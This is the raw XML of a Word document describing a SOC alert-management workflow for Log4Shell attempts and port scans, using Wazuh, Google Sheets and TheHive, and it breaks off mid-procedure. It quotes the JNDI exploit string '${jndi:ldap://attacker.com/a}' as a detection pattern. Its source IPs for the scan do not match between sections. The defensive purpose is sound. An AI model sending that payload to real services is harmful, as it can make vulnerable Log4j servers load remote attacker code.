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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow: Alert Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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1. Objective</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To classify, prioritize, document, visualize, and escalate alerts specifically for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4Shell exploitation attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Scanning activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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2. Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="94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Google Sheets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Classification </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS scoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="94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Wazuh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Alert generation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dashboards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="94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TheHive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Case creation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="98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3. Workflow Steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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1: Collect Alerts from Wazuh</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Identify two alerts from Wazuh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Critical Alert: Log4Shell Exploit Attempt Detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Trigger: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-44228</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">${jndi:ldap://attacker.com/a}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in logs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Low Alert: Port Scanning from 10.10.2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Trigger: Multiple connection attempts across ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Rule: Reconnaissance behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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2: Alert Classification in Google Sheets</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before="0"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Create columns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alert ID</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="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t xml:space="preserve">Type</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="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t xml:space="preserve">Priority</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">actic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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Add entries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log4Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="983"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="0"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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Then add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>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4: Wazuh Dashboard for Log4Shell &amp; Port Scanning</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Create visualizations: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Pie Chart: Alerts by Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="94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Critical (Log4Shell)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="94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Low (Port Scan)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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5: Response Procedure</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A. Log4Shell Exploit Attempt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Procedure:</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Validate detected payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">${jndi:ldap://...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in logs.</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Check server version for Log4j vulnerability (2.0–2.14.1).</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Isolate server from network if exploit attempt succeeded.</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Block attacking IP on firewall.</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Search for:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Suspicious outbound LDAP traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Downloaded payload files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Reverse shells</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Patch Log4j t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.17+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Review Wazuh logs for repeated attempts.</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Create an incident in TheHive.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Document every action.</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B. Port Scanning Activity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Procedure:</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Identify scanning source IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.6.</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Check number of ports scanned&amp; frequency .</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Correlate with firewall logs or Nmap-like patterns.</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Validate whether source IP is internal or external.</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If repeated scans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> escalate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
